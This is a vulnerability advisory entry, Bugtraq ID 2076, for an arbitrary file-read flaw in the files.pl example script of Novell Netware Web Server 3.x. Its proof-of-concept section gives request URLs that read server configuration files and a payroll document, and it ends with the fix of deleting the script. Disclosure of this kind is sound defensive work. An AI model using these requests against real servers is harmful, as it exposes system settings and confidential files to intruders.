Novell Netware Web Server 3.x files.pl Vulnerability
BID:2076
Info
Novell Netware Web Server 3.x files.pl Vulnerability
| Bugtraq ID: | 2076 |
| Class: | Configuration Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Dec 01 1998 12:00AM |
| Updated: | Dec 01 1998 12:00AM |
| Credit: | Discovery information is not currently known. |
| Vulnerable: |
Novell Web Server Examples Toolkit 2.0 |
| Not Vulnerable: | |
Exploit / POC
Novell Netware Web Server 3.x files.pl Vulnerability
http://victim.host/perl/files.pl?file=sys:system/autoexec.ncf
http://victim.host/perl/files.pl?file=sys:etc/ldremote.ncf
http://victim.host/perl/files.pl?file=vol2:apps/accounting/payroll.doc
http://victim.host/perl/files.pl?file=sys:system/autoexec.ncf
http://victim.host/perl/files.pl?file=sys:etc/ldremote.ncf
http://victim.host/perl/files.pl?file=vol2:apps/accounting/payroll.doc
Solution / Fix
Novell Netware Web Server 3.x files.pl Vulnerability
Solution:
Delete the offending script, as it is not necessary for normal system functioning. Novell has removed the file from the Web Server Examples Toolkit.
Solution:
Delete the offending script, as it is not necessary for normal system functioning. Novell has removed the file from the Web Server Examples Toolkit.